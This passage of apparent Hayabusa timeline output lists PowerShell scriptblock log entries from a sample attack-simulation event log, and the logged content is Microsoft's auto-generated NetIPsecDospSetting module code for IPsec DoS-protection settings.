Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,")')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 